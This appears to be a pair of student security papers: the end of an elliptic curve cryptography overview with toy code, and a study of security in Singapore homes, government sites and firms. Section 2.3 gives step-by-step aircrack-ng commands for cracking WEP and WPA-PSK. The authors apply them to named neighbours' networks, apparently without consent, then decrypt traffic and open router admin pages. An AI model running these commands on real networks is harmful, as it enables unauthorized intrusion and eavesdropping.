Parameters for different finite fields). Both entities will each have a pair of keys
consisting of a private key d, which is a randomly generated integer less than n, where
n is the order of the curve, and a public key Q = d.G where G is the generator point
within the elliptic curve domain parameter.
For instance, Alice will have her private and public key pair (dA, QA) and Bob will
have (dB, QB). To generate the shared secret key, both will do the following:
1) Alice computes K = (xK, yK) = dA.QB
2) Bob computes L = (xL, yL) = dB.QA
3) Since dA.QB = dA.dB.G = dB.dA.G = dB.QA, we have K = L and therefore
xK = xL
Hence, the shared secret key between Alice and Bob is xK (or xL). As mentioned, a
third party will not be able to obtain the shared secret key, as it is practically
impossible to find the private keys dA or dB from the public keys QA or QB.
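The three ECDH steps above can be sketched with the same kind of toy curve (y^2 = x^3 + 2x + 2 over F_17 with generator G = (5, 1) of order n = 19, our own illustrative choice):

```python
import random

# Toy curve y^2 = x^3 + 2x + 2 over F_17; G generates a group of order 19.
P_MOD, A = 17, 2
G, N = (5, 1), 19

def ec_add(P, Q):
    # Group law on the curve; None represents the point at infinity.
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (lam * lam - x1 - x2) % P_MOD
    return (x3, (lam * (x1 - x3) - y1) % P_MOD)

def ec_mul(k, P):
    # Scalar multiplication k.P by double-and-add.
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

# Each party picks a private d < n and publishes Q = d.G.
dA = random.randrange(1, N); QA = ec_mul(dA, G)
dB = random.randrange(1, N); QB = ec_mul(dB, G)

K = ec_mul(dA, QB)   # Alice computes dA.QB
L = ec_mul(dB, QA)   # Bob computes dB.QA
print(K == L)        # True: both equal dA.dB.G; the secret is the x-coordinate
```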
6 Possible attacks
In elliptic curve cryptography, the computation of the scalar multiplication Q = d.P
of a point P by the secret scalar d is a critical step. Hence many attacks aim to
recover the value d, which is the private key.
6.1 Side-channel attacks
A side channel attack is an attack based on information gathered from the physical
implementation of a cryptosystem, which is different from a brute force attack or
cryptanalysis. Timing information (the amount of time various computations take
to perform), the power consumption of the hardware, electromagnetic radiation leaks
(which can provide plaintexts and other information) and even the sound produced
during computation can provide an extra source of information which can be used to
reveal secret keys and attack the cryptosystem.
There is an increasing trend of ECC implementations on smart cards and other
portable devices, where the secret key is stored inside the smart card, which is seen as
a tamper-proof device since it is considered impossible to directly obtain the secret
key without destroying the information. This trend makes ECC vulnerable to side
channel attacks. In a simple side channel attack, the attacker tries to derive the secret
key directly from the samples obtained. To break the system successfully, the attacker
needs in-depth knowledge of the ECC implementation under attack, must be able to
monitor the side channel leakage of the device, and the secret key to be revealed must
have a significant impact on that leakage.
In implementations of ECDSA's scalar multiplication Q = d.P, side channel attacks
exploit the different patterns between the side channel features of the addition
operations and the doubling operations on the point P of the elliptic curve. Hence, a
secure method of preventing side channel attacks is to remove the dependence
between the different side channel patterns of the addition and doubling operations.
One way to remove the key-dependent patterns is to make the processing of the "1"
and "0" bits of the multiplier d indistinguishable. This makes the addition and
doubling operations indistinguishable: each process is divided into blocks, and
dummy operations are inserted so that the attacker observes only a repetition of
identical instruction blocks.
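One classic instance of this idea is "double-and-add-always" scalar multiplication: a doubling and an addition are performed for every key bit, and the addition result is simply discarded when the bit is 0, so the operation trace is identical for every key of a given length. A minimal sketch, using the additive group of integers mod 97 as a stand-in for curve points so it stays self-contained:

```python
def scalar_mult_always(d, P, add, dbl, identity, trace):
    # Double-and-add-always: one doubling and one addition per key bit.
    # When the bit is 0 the addition is a dummy whose result is discarded,
    # so an attacker watching the D/A operation sequence learns nothing.
    R = identity
    for bit in map(int, bin(d)[2:]):
        R = dbl(R); trace.append("D")
        T = add(R, P); trace.append("A")   # always executed
        R = T if bit else R                # keep the sum only when bit = 1
    return R

# Stand-in group: integers mod 97 under addition, so d.P is just d*P mod 97.
add = lambda a, b: (a + b) % 97
dbl = lambda a: (2 * a) % 97

t5, t7 = [], []
print(scalar_mult_always(5, 3, add, dbl, 0, t5))   # 15, i.e. 5*3 mod 97
print(scalar_mult_always(7, 3, add, dbl, 0, t7))   # 21, i.e. 7*3 mod 97
print(t5 == t7)                                    # True: identical traces
```

With real elliptic curve point operations substituted for `add` and `dbl`, the dummy additions hide the key bits at the cost of roughly one extra addition per bit.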
6.2 Fault attacks
While side channel attacks are passive attacks, whereby the attacker listens to some
side channel for leakage without interfering with the computation, fault attacks (also
known as fault analysis attacks) are active attacks: the attacker has access to the
target device and tampers with it in order to create faults, or the faults may occur due
to hardware failure or bugs while the device is performing a private key operation.
Basically, the attacker takes advantage of the faults caused by his malicious activity
or by hardware failure. He can collect the incorrect data (caused by the faults),
together with side channel information such as timing and power consumption,
emitted while the device is computing with the private key.
7 Implementation
We realize that a fair amount of mathematical knowledge is involved in Elliptic
Curve Cryptography, which might make it harder for people to understand how this
technique works. So, in order to present this topic more intuitively and make the
theory easier to digest, we have developed a set of "Teaching ECC" web pages. These
web pages graphically detail the key elliptic curve point operations and the elliptic
curve discrete logarithm problem involved. We also show how the underlying elliptic
curve operations work through an example of practical use, the Elliptic Curve
Digital Signature Algorithm (ECDSA). The web pages are hosted at http://xiaokangz.comp.nus.edu.sg/CS3235/ECC .
Introduction Page:
This page briefly introduces Elliptic Curve Cryptography and the general idea behind
it. Key advantages of the technique are listed to show the motivation for using such a
scheme in computer security, and readers will gain a basic understanding of the
underlying theory of this cryptography.
Elliptic Curve Point Operations Page:
This page serves the purpose of giving the necessary mathematical background used
in Elliptic Curve Cryptography. We show the group law of an elliptic curve using
graphs, and in order to give readers an intuitive idea of how point operations are
done, interactive step-by-step demonstrations of point doubling and point addition are
provided. Simply go through every step of the operations by clicking the mouse, and
each step will be shown clearly on the graph.
Elliptic Curve Discrete Logarithm Page:
The high security of Elliptic Curve Cryptography relies on the difficulty of the
Elliptic Curve Discrete Logarithm Problem. This page introduces and explains the
problem using a simple example. To show how secure Elliptic Curve Cryptography
is, we compare its key size with those of other cryptography schemes.
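A brute-force solver makes it concrete why the problem is hard only at scale. The sketch below assumes the same kind of tiny illustrative curve (y^2 = x^3 + 2x + 2 over F_17 with G = (5, 1)), chosen by us for illustration:

```python
# Toy curve y^2 = x^3 + 2x + 2 over F_17, with base point G = (5, 1).
P_MOD, A = 17, 2
G = (5, 1)

def ec_add(P, Q):
    # Group law on the curve; None represents the point at infinity.
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (lam * lam - x1 - x2) % P_MOD
    return (x3, (lam * (x1 - x3) - y1) % P_MOD)

def ecdlp_bruteforce(Q):
    # Walk d.G for d = 1, 2, 3, ... until we hit Q. Linear in the group
    # order, hence hopeless for real curves with around 2^160 points.
    R, d = G, 1
    while R != Q:
        R = ec_add(R, G)
        d += 1
    return d

# Build a "public key" Q = 13.G by repeated addition, then recover 13.
Q = G
for _ in range(12):
    Q = ec_add(Q, G)
print(ecdlp_bruteforce(Q))   # 13
```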
Elliptic Curve Digital Signature Algorithm Page:
We take a real application of Elliptic Curve Cryptography, the Elliptic Curve Digital
Signature Algorithm (ECDSA), for demonstration. This page clearly shows all the
steps involved in both signature generation and signature verification. We have built a
simple underlying engine for the Elliptic Curve Digital Signature Algorithm which
simulates the whole flow using small numbers, so readers can experience walking
through the digital signature generation and verification process.
Security Requirement in Different Environments
Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang
National University of Singapore
21 Lower Kent Ridge Road
Singapore 119077
Abstract. The rationale for conducting this research is to explore the different
security measures and policies adopted in environments such as the home, the
office and the government. For the office and military environments, we visited
several companies in Singapore, such as DSO and English Corner, for a field
study to understand how these companies protect their data and information.
The observations gathered are used to determine the security level of the various
environments. However, we see a limitation of the research into the government
environment, as details and policies are mostly non-disclosable, so only limited
information could be gathered via Internet research and field study. As for the
home environment, a practical approach to detecting network vulnerabilities is
taken: open source software on a Linux operating system is used to crack
wireless network security. Moreover, an online survey was conducted to gather
more information about how individuals secure the wireless networks in their
home environment.
1 Introduction
Security issues and policies have been a regular topic in news articles and are a
growing concern for all types of organizations, ranging from the individual home
environment to large organizations such as governments. In addition, these different
environments may be required to deploy different standards of security policy.
Therefore, this document aims to look at the different security measures taken by
entities in different environments, specifically the Home, Government and Enterprise
environments. Through examining physical measures, computer security policies and
wireless network security, this paper tries to get a sense of how knowledgeable these
entities are and how far they are willing to go in protecting themselves from
information theft.
This research paper aims to highlight the different aspects of each environment,
thereby identifying ways in which improvements should be made appropriate to the
environment.
2 Security in Home environment
2.1 Types of device (Router, Modem) and Wireless Security used
The security deployed in the home environment varies between individuals and often
depends on the type of Internet service they subscribe to. In Singapore, there are four
available network providers, namely SingNet, Starhub, Pacnet and M1. However,
most Singaporeans subscribe to either SingNet or Starhub, as evidenced by the
survey (Figure 33), which shows that 71% of individuals use SingNet and 24% use
Starhub, so only these two providers will be discussed.
Individuals who subscribe to SingNet are provided with a modem (2WIRE), which
comes pre-configured with default security settings. The older default for this modem
uses WEP encryption for the wireless network, and no password is required to access
the device's administration interface; this is supported by the collected survey results
(Figures 16 to 32), where individuals who subscribed to SingNet more than a year ago
use WEP encryption for their wireless networks. Although the newer device has
improved wireless security (WPA-PSK MIXED is used), there is still no default
password required to access the administration interface. On the other hand, the
security for Starhub can be quite different, and more vulnerable: the default setting for
its device (Linksys) has no wireless protection at all, and anyone can connect to it.
Individuals are required to set up their own security if they use Starhub.
There are other routers on the market that individuals can use to replace, or add on to,
these existing routers, and which ought to deploy better security than the providers'
devices. However, individuals are seldom willing to spend extra money on a router
when the existing one suffices for surfing the Internet. The following sections discuss
the vulnerability of wireless networks in the home environment, based on practical
tests deployed near a range of home networks.
2.2 Wireless security deployed in home environment (Research)
There are some pre-requisites before our practical test can be deployed in the home
network environment. In our test, we use a USB D-Link network device as the base
station to detect nearby wireless signals. We use Ubuntu 11.10 as our operating
system, as it runs network-monitoring tools more efficiently than Windows. Various
tools are used, such as aircrack-ng, tcpdump, etc.
To look up nearby wireless networks, the 'airodump-ng' monitoring tool from the
aircrack-ng suite is used. Figures 1 and 2 show all the nearby available wireless
networks when the command "airodump-ng mon0" is entered, where mon0 is the
wireless interface used. These two figures were captured at different locations, and
we can see that most wireless networks use WEP to secure the network; some
networks are secured using WPA/WPA2, but some are not secured at all.
There are many reasons why WEP is still used to secure wireless networks in the
home environment. The most basic and common reason is that individuals have no
prior IT knowledge. To them, being able to connect to the Internet with a simple
protection to deter unauthorized users is sufficient. They have no knowledge of what
WEP, WPA and WPA2 are, often just use the default protection provided by the
Internet providers, and some do not protect their wireless networks at all.
The second reason may lie with the ISPs and vendors who supply the modems and
routers. Older devices, from 3 to 4 years ago, use WEP as the default protection; the
ISPs' effort in offering WEP was to prevent sharing of the Internet connection rather
than to protect the individual's security. Although the basic protection on newer
devices uses WPA/WPA2, many individuals have not changed over and are still
using the older devices. WPA/WPA2 is used because of the weaknesses in WEP, and
also because the larger coverage area supported (IEEE 802.11n) can be prone to attacks.
WEP encryption is vulnerable to attack, and there are available tools that take
advantage of weaknesses in the WEP key algorithm to successfully attack a network
and discover the WEP key [1]. Cracking a WEP network does not require
sophisticated hardware or software tools; a Wi-Fi enabled laptop and open-source
network tools are sufficient. In the next section, we will show how easily WEP can be
cracked compared to WPA and WPA2.
2.3 Vulnerability (Research)
2.3.1 WEP
A number of flaws were discovered in the WEP algorithm. In particular, there are
attacks such as passive attacks that decrypt traffic, active attacks that inject new
traffic, active attacks that decrypt traffic, and dictionary-building attacks that allow
real-time automated decryption of all traffic [2].
In this study, we use aircrack-ng [3] to recover WEP keys. Aircrack-ng uses the
unique initialization vector (IV) inside each packet, and a large amount of data
packets is required to crack the WEP key. With a large number of packets captured,
the key can be found by running the standard FMS, Korek and PTW attacks on the
captured data packets.
In the previous section, we managed to probe for nearby wireless networks; the next
step is to locate a WEP-secured network that can be used for the break-in. In Figure
3.1, we can see that the ESSID "ruiqi", with BSSID 00:1A:70:95:6A:C6, uses WEP.
We will use this network to recover the WEP key.
To monitor and capture the traffic for 'ruiqi', the command "sudo airodump-ng -c
11 --bssid 00:1A:70:95:6A:C6 -w ruiqi mon0" is executed, where -c is the channel to
listen on and -w is the file to be written. If there is no existing host connected to the
network, the data capture will be very slow (approx. 20,000 packets are required), and
sometimes it will be slow even when a host is connected (Figure 3, top left).
The next step is to do a fake authentication with the Access Point (AP): in order for
the AP to accept packets, the source MAC address must be associated with it.
To associate with the access point, the command 'sudo aireplay-ng -1 6000 -o 1 -q 10 -e
ruiqi -a 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0'1 is issued. This packet is
sent to the AP continuously to keep the association alive (Figure 3, top right).
Although we managed to do a fake authentication with the AP, packets were
received from the AP very slowly. To speed things up, packet reinjection with
'aireplay-ng' is used: after the command 'sudo aireplay-ng --arpreplay -x 50 -b
00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0' is issued, the number of data
packets shoots up dramatically (Figure 3, bottom right).
After a certain number of packets has been received, in this case 20,006 packets, the
last step is to process these packets in order to recover the WEP key. The command
'aircrack-ng -b 00:1A:70:95:6A:C6 ruiqi-01.cap' is issued to start cracking, and the
WEP key was found after processing these packets (Figure 3, bottom left).
To verify that the key does work, it is used to decrypt the packets sent and received
via the 'ruiqi' AP. In Figure 3.4, we can see the decrypted packet headers in plain
text, including some packets sent from the owner's host to the AP.
Other than the 'ruiqi' AP, we also tested other APs that use WEP; the results are
shown in Table 1, and the individual APs are shown in Figures 4 to 7.
With all these WEP APs cracked, it is evident that WEP is not really secure, as it
does not require much effort to crack: less than three hours to crack all five APs in
our case. Table 2 shows the fully detailed steps of cracking an AP that uses WEP to
secure its network.
2.3.2 WPA/WPA2
Compared to WEP, WPA and WPA2 require more effort and time to crack, and only
pre-shared keys (PSK) can be cracked using available software such as aircrack-ng.
Unlike WEP, where we can speed up the packet capture to retrieve enough IVs to
find the key, the only attack on WPA and WPA2 is a plain brute-force technique
(dictionary attack), because the key used is not static, so collecting IVs does not
speed up the attack. Instead, the information used to start cracking WPA and WPA2
is the handshake between the client and the AP. To illustrate, we tried to attack WPA
and WPA2 in the home environment, and our results are below.
To start the interface and probe for nearby wireless networks, the method used is the
same as in the previous section and will not be discussed here again.
Instead of monitoring and capturing traffic from the chosen network, in this case the
ESSID "Remyidah" shown in Figure 4.0, we collect the authentication handshake for
that network; the command "airodump-ng -c 9 --bssid 00:1A:2B:8A:48:B9 -w
Remyidah wlan0" is used, as shown in the top image of Figure 10.
1 In this command, -1 means fake authentication, 6000 is the re-association timing in
seconds, -o 1 means send only one set of packets at a time, and -q 10 means send
keep-alive packets every 10 seconds.
Although there is a way to deauthenticate a wireless client by using the command
"aireplay-ng -0 1 -a 00:1A:2B:8A:48:B9 wlan0", this attempt failed in our case.
Therefore, we waited nearly three hours for new 4-way handshakes to occur in the
network, as shown in the bottom image of Figure 4.0. Once the handshakes were
captured and saved into Remyidah.cap, the next step is to actually crack the
WPA/WPA2 pre-shared key with the password list we have obtained. The command
"aircrack-ng -w password.lst -b 00:1A:2B:8A:48:B9 Remyidah.cap" is used, and the
result is shown in Figure 11.
Unfortunately, we were unable to crack the passphrase for the Remyidah network,
but we also demonstrated the method on our own device with a passphrase taken
from a list of commonly used words, as shown in Figure 12, and retrieved the
passphrase.
In conclusion, we can see that WPA-PSK and WPA2-PSK are vulnerable to brute-force
attack if the keys used are commonly known English words, known passwords,
or relatively short in length. Otherwise, it is nearly impossible to crack and hack into
WPA, because the technique becomes far more difficult against a long, random
alphanumeric passphrase. The steps of our attempt to crack WPA-PSK and
WPA2-PSK are detailed in Table 3.
2.4 Other vulnerabilities in home environment (Research)
2.4.1 Administrator Access
Every router or modem has its own set of controls to manage the network, such as
MAC filtering and the network firewall. These controls can be accessed via the
router's address, for example 192.168.0.1, only by those who have administrator
rights. By default, most of these devices do not use any protection, and even when
they do, the user ID and password are identical defaults, for example 'admin' for both.
In the survey we conducted to gain a better understanding of individuals' access to
their home networks, almost 42% of individuals did not secure their network or used
the default settings for its protection. Moreover, Figures 13 and 14 display the
administration pages of the home networks whose WEP keys we cracked previously.
In Figure 13, there is no password protection, so the page can be accessed without
any effort. Although there is password protection in Figure 14, the default credentials
are used: 'admin' for both username and password.
We can see that for most home networks, individuals do not set or change the
password for their device. Hence, if their keys are ever compromised, their device can
also be taken over by the intruder, although they can reset the device if that happens.
2.4.2 Firewall
By default, the firewall of a home modem blocks unwanted activity from the Internet
and acts as a first-tier defense for all the devices connected to the AP. Although this
firewall is not able to inspect packets the way a software firewall can, the blocking
prevents the home network from being flooded and can deter attacks such as DNS
attacks. The firewall on routers and modems is enabled by default and is sufficient
protection for the network itself. Figure 15 shows the default firewall settings of the
previously hacked home network.
3 Security in Government's Institutes
In government institutes, there are huge collections of secret and confidential
information stored on employees' laptops and on central servers within the institutes.
In addition, frequent transmission of top-secret and confidential documents in digital
form is required for normal operations every day. Hence, there is a need to maintain a
proper level of security for these digital resources.
In Singapore, the government has entrusted several companies to develop a wide
spectrum of unique technologies and solutions to safeguard government institutes
against potential security threats. For example, the Singapore government partnered
with e-Cop, which developed the government's centrally administered desktop
firewall (CAFÉ) and provides 24x7 network surveillance technology and services to
detect attacks before they can cause any harm to IT systems [4]. Another example is
the partnership with OPUS IT, which provides network forensics security solutions to
various government agencies in Singapore. Its network-centric forensic technology
system acts as a 'silent' shadow surveillance, enabling detective work on security and
policy breaches as well as fine-tuning of high-end network performance throughput.
All systems developed by e-Cop and OPUS IT are employed in Mindef-related
institutes.
To prevent intellectual property, trade secrets, and other confidential and
proprietary business information from leaking out via recording devices, the
Singapore government banned camera phones and other recording devices in
Mindef-related institutes and in agencies working on projects with confidential
information. Severe punishment is handed to personnel who fail to comply with the
policy. This policy is implemented in many countries' government agencies, such as
those of Japan, China and Malaysia. Malaysia barred all gadgets with camera
facilities from being brought into high-security government premises; the ban
prevents spying and the leaking of sensitive information or official secrets, which
could jeopardize national security [5]. In addition, government bodies were also
instructed to look into installing electronic jamming devices in security zones to
prevent unauthorized communication or transmission of data and images [5]. The
electronic jamming devices work by combining hardware transmitters with a small
piece of control software loaded into the camera phone handset: whenever the camera
phone enters an area with the electronic jamming hardware, the phone's camera is
deactivated [6]. This prevents personnel from using the camera in areas secured with
electronic jamming hardware.
3.1 Centrally Administered Desktop Firewall
The main intention of CAFÉ is to eliminate network-based attacks transmitted via
thumb drives within the government. When a user connects to the Government
network, directly or remotely, from a government desktop, an updated set of desktop
firewall policies is downloaded. Whenever a thumb drive is inserted into the desktop,
CAFÉ scans through all the data on it. In the event that an infected computer is
connected to the government network, CAFÉ will prevent the computer from
spreading threats to other computers on the network. CAFÉ is further enhanced by
24x7 round-the-clock surveillance, which provides comprehensive reporting, incident
handling with prompt responses, and prevention of unauthorized access or intrusion [4].
Similar to Singapore, the USA also limits the usage of thumb drives and all other
removable devices on its networks, due to concerns that malicious programs may be
transmitted using these media [7].
3.2 Case Study in DSO
While working at the Defense Science Organization (DSO) as an intern during the
last vacation, I noticed that it enforces very stringent security regulations on all
employees and visitors entering the building. A possible reason is that the activities
conducted in the company are highly confidential, as it is responsible for conducting
research for future warfare: its purpose is to develop technologies and solutions for
the Singapore Armed Forces, to sharpen the cutting edge of Singapore's national
security.
When entering the building, all visitors and employees are screened by the security
guards before they are cleared to enter. No devices with a camera function are
allowed to be brought into the building. This ensures that no one can use such devices
to capture important information and leak it to unauthorized parties. Furthermore,
employees are only allowed to bring in authorized laptops or equipment issued by
DSO. Compared to other companies, DSO does have tighter security checks, as it
tries to prevent potentially harmful devices from entering the company.
To access a department in the building, employees are required to scan their access
card. However, each access card has different access rights or permissions depending
on the individual's job, rank and security clearance.
An interesting point to note is that there is no wireless connection in the entire
building; employees are required to access the Internet using a wired connection
(Ethernet). My mentor in DSO highlighted to me that a wired connection is inherently
more secure than a wireless one. Wireless, by its technological nature, can be
intercepted easily, as the data being sent and received is transmitted through the air.
Though wired connections can also be infiltrated, the need for physical access to the
wires in most cases makes them inherently much more secure [8]. The security of the
wired connection is enhanced by the strict security checks at the entrance of the
building, and numerous surveillance cameras are installed at various places to detect
suspicious activities.
However, the Ethernet cable used is Cat 5/6 twisted pair, which is not "Tempest"
shielded. This means that the cable will emit electromagnetic radiation (EMR) in a
manner that can be used to reconstruct intelligible data; with the correct equipment
and techniques, it is possible to reconstruct all or a substantial portion of that data [9].
The electromagnetic radiation can be picked up from a distance of around 200 to 300
meters. However, we do not have much information about what DSO does to protect
against the susceptibility of Ethernet cables to emitting electromagnetic radiation.
DSO may have employed several safeguards against TEMPEST attacks. First,
unauthorized individuals do not have access to the building, which means they have
no means of getting close to the source of the electromagnetic radiation. Secondly,
the walls of a department may be constructed in a way that blocks unintentional
emissions from leaving that particular department. Other measures, such as filtering
and shielding of the communication devices, can be applied for EM isolation [10].
As mentioned earlier, a wide spectrum of technologies is employed in government
institutes. DSO also uses a centrally administered desktop firewall (CAFÉ) and
provides 24x7 network surveillance technology and services.
4 Security in Enterprises
In the office environment, employees handle different types of files every day, and
certain files are accessible only to upper management. Therefore, different
enterprises have different sets of rules and regulations in their security policies.
In addition, different enterprises may employ different network settings and
different wireless encryption schemes. In this section we review the security
environments of two firms, United Test and Assembly Center Ltd (UTAC) and English
Corners, and compare their policies: one is a relatively large company, while the
other is a small enterprise of fewer than 10 employees.
4.1 Case Study in English Corners (Singapore Firm)
The first case we review is a small company named English Corners, which sells its
own books and educational toys to primary school children and their parents. In this
section we look at the various policies and security measures of this small
enterprise.
First, the office has an open-concept policy, which means that customers can simply
walk into the company to purchase items, and thus come into contact with all the
staff and computers. To protect the workstations from being viewed or used by
others, they are protected with passwords, and employees are required to log in with
their assigned user ID and password. In addition, there is a rule that an employee
has to attend to customers before they get close to a workstation, and must log off
their own workstation while attending to them. This prevents other users from using
it.
As a small enterprise, the company uses a wireless connection via a router for
Internet access. The password for the wireless network is supposed to be known only
to higher management. However, there is a flaw here, as the computer with access to
the router was not properly secured. Interns are required to open the company and
start up its systems every morning, so every intern allocated to starting up the
systems learns the password to the network. In addition, because the company is a
small enterprise, it does not have an IT support department; all the networking and
the company website are handled by the boss's son.
The security of the network was therefore of bare minimum protection, namely Wired
Equivalent Privacy (WEP), which was discussed above in section 2 on the home
environment. Compared with a home environment, an office environment has more users
on the wireless network, which makes office users more vulnerable over the wireless
network. English Corners also has low security on file protection: being a small
company, it has no intranet for passing files from one person to another, so all
file transfers are done via thumb drive. This allows all personnel in the office to
access all sorts of files on the thumb drive. This total lack of security allowed
even us interns to view many different files, e.g. the customer database
spreadsheet, including customers' confidential credit card numbers, and many others.
There is no file access control at all, and all employees can easily read or modify
the files on the thumb drive. In addition, there was no policy against using a
personal thumb drive to copy out documents and finish work at home.
In conclusion, the company one of our researchers worked in has limited and low
security, likely because, without an IT department to set up and enforce a set of
rules, it does not understand the importance of protecting its data. It should set
up a policy forbidding the use of external storage devices, set up an intranet for
workers to share their documents, and establish a file access policy specifying who
has access to what sort of information.
4.2 Case Study in United Test and Assembly Center Ltd
The second case study is of a high-tech manufacturing firm, United Test and Assembly
Center Ltd (UTAC), which produces chips such as the SIM cards used in mobile phones.
It has reasonable security policies in place to protect the designs and technologies
used in its manufacturing processes.
To go past the reception area, employees have to scan their employee pass at a
sensor in order to open a door. Within the building itself, employees have to scan
their pass repeatedly to get to where they need to go, because the building is
divided into many areas. These generally fall under one of four categories:
manufacturing, research and development (R&D), general administration, and
management information systems (MIS), i.e. the IT department. Each area is separated
by doors which require an employee to scan his pass to open them. Hence UTAC
controls the areas an employee can access through the use of different levels of
passes. This is similar to the scenario described in our DSO case study.
Visitors staying for a long period of time (e.g. more than a day) need to exchange
for a visitor pass. Otherwise, they must be accompanied at all times by an employee,
who brings them in and stays with them throughout their visit. Everyone who wants to
exit the building has to go through a metal scanner under the watchful eyes of at
least one security guard. This is to prevent the chips being manufactured from being
taken out and leaked to competitors.
However, unlike DSO, UTAC has a wireless connection within the building. WPA is used
as the form of encryption for the wireless connection. Furthermore, the username and
password for the wireless connection are not known to all employees; they are given
out on a need-to-know basis. Also, the username used to access the network is linked
to the employee's company profile, so their rights on the Internet are limited to
what their individual company profile grants. This point is discussed further below.
Although it appears that thought has been given to wireless security, UTAC has a
second wireless connection for visitors. This second network has no encryption, and
its username and password are freely given out. Add the fact that there is no
restriction at all on what users can do on this network, and it looks as though the
wireless security of UTAC is very easily compromised. However, one cannot help but
wonder whether this network is deliberately set up in such a manner to let visitors
access the Internet easily, with security measures in fact in place, such as
separating this network from the company network via a demilitarized zone (DMZ).
What exactly has or has not been done regarding this second wireless network has not
been disclosed to us.
As mentioned earlier, each employee has an individual profile in the company
network. This is used to control access to files and folders on the company network.
Each department has a shared virtual drive to save its work, and an individual's
profile determines which files he has access to. Internet access is also based on
this profile, with most employees having no Internet access at all, some having
limited access to a restricted set of websites, and only a few having full Internet
access.
Desktop security is another aspect to take note of. UTAC has a centralized firewall
using Symantec software running on every PC in the building. This software is
centrally administered on a server, and updates are pushed to the PCs every night.
In addition, the Symantec software is also used to prevent the use of thumb drives
and other storage devices on the PCs.
Lastly, UTAC has a policy that no thumb drives or other external storage devices may
be carried in or out of UTAC premises. Exceptions can be made by requesting approval
from the IT department; upon approval, a sticker is given to be pasted on the
approved device. Laptops are subject to the same policy. The policy is also upheld
by the metal scanner that everyone has to pass through to exit the building, and the
security guard will also ask to look into the bags of everyone who exits.
4.3 Comparison of firms
As we can see from the two cases above, there are several differences in security
policy. The first is that one firm's employees are allowed to use external storage
devices while the other's are not. This is due to the differences in company
structure and to the availability of an intranet in UTAC but not in English Corners:
employees of UTAC can transfer their files within the organization, while English
Corners' employees have to rely on thumb drives or email to transfer or share files.
The policy against external storage devices exists to prevent employees from
stealing information from the company, so on this point UTAC has a stricter security
policy than English Corners regarding the protection of its data. In addition,
English Corners allows all employees to access all files and to modify them, whereas
in UTAC employees are only allowed to view documents at the level permitted by their
profile.
5 Comparison of the Various Environments
In view of our research, we can see different levels of security policy deployed in
the three different environments, namely the government, office and home
environments. As reviewed, the government requires the most secure environment due
to the nature of the data it holds and handles. The office and home environments, on
the other hand, are less secure due to their nature, the technical knowledge of the
individuals involved, and the support given.
The government environment uses wired connections despite the availability of newer
wireless technology, because that technology still contains vulnerabilities that
could be exploited; wired networks are used to prevent unauthorized personnel from
intercepting packets transmitted over the air, which can be done easily in the case
of a wireless connection. However, the wired connections used by Singapore
government institutes still emit electromagnetic radiation. Further preventive
measures are taken against the tapping of wired cables, such as installing more
surveillance cameras to look out for suspicious activities.
In general, both office and government environments have security guards in the
compound who conduct checks on employees and visitors to screen out suspicious or
unauthorized items being brought into the area. However, most companies allow
employees to bring in camera phones, with the exception of government agencies such
as Mindef and DSO, whose employees are prohibited from doing so. Failure to comply
with the camera phone ban results in severe punishment: for example, an intern at
DSO caught with a camera phone may be dismissed, while an employee of a
Mindef-related institution such as the SAF may be court-martialled for bringing in a
camera phone.
In contrast, wireless networks are enabled in most individual homes, because the
modems and routers that come bundled when users sign a contract with a network
provider usually have wireless capability turned on by default. Moreover, enabling
wireless means more convenient Internet access anywhere in the home and can reach
more users. The security of different home environments varies with the owners'
technological knowledge, but many home users rely on the default security settings
to protect their wireless networks. For older routers and modems, the default
security setting is WEP, which is flawed and has already been broken, so anyone can
break into these home networks easily.
6 Limitations
During our research we faced certain limitations. One limitation was the lack of
information we could gather over the Internet for the government environment. The
only information we have for our case study (DSO) was provided by one of our
authors, who worked in the government institute as an intern. Even so, we were quite
restricted in the information we could obtain from DSO, since the privileges and
access permissions given to an intern are restricted to the project assigned to
them. Hence the information gathered from the intern may be only the tip of the
iceberg, and there may be more security measures in place that we did not discover.
In addition, interns are required to sign a non-disclosure agreement stating that
they will not disclose confidential information about the project or about the
structure and layout of the building they work in. This limits the scope of what we
could write in this report.
Another limitation we faced in our research on the home environment was that we had
to be stationed near the targeted network, since packet loss at a distance would
hinder our sniffing for network vulnerabilities. We therefore needed multiple access
points available in the vicinity in order to attempt cracking.
In addition, there is a limitation to the dictionary attack we performed when
cracking passwords: since we do not have a supercomputer that can generate candidate
keys quickly, we were only able to crack passwords that are commonly used English
words or known passwords that are relatively short.
7 Conclusion
From our research, the government has adopted the most comprehensive and restrictive
policies, standards and procedures for maintaining a secure infrastructure for
transmitting sensitive information. The security around government institutes is
generally adequate, but certain measures may seem too rigid, which can result in
inconvenience and unhappiness among employees.
Office environments employ different standards of security policy from firm to firm,
with some companies having stricter policies than others. For example, wireless
network security at an office such as English Corners may not be adequate.
Improvements are needed in several areas: enhanced policies and standards for
wireless networking, stronger management and monitoring of wireless operating
activities, and the use of WPA as the security key for wireless connections. In
addition, we would suggest using an intranet for file sharing, with file access
levels to prevent unauthorized access to confidential files.
The default security key used in the home environment should be changed to WPA so
that individuals can enjoy a more secure network in their homes. ISPs should step in
and help their customers, either by guiding them in changing existing devices from
WEP to the stronger WPA setting, or by persuading them to upgrade to a newer router
or modem. Moreover, ISPs should also help their customers secure the administrator
pages of these devices with a better protection mechanism to further deter
intrusion. This would allow less IT-savvy users to enjoy higher protection while
using wireless networks in their homes.
References
1) Boncella, R. J. (2002). Wireless Security: An Overview. Retrieved 30 October 2011, from
http://www.washburn.edu/faculty/boncella/WIRELESS-SECURITY.pdf
